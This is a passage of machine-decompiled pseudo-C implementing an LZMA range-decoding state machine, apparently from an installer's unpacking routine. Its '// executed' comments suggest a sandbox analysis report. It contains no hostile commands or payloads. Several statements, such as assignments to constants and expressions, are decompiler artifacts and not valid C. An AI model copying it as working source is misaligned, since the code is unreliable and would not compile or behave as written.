											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
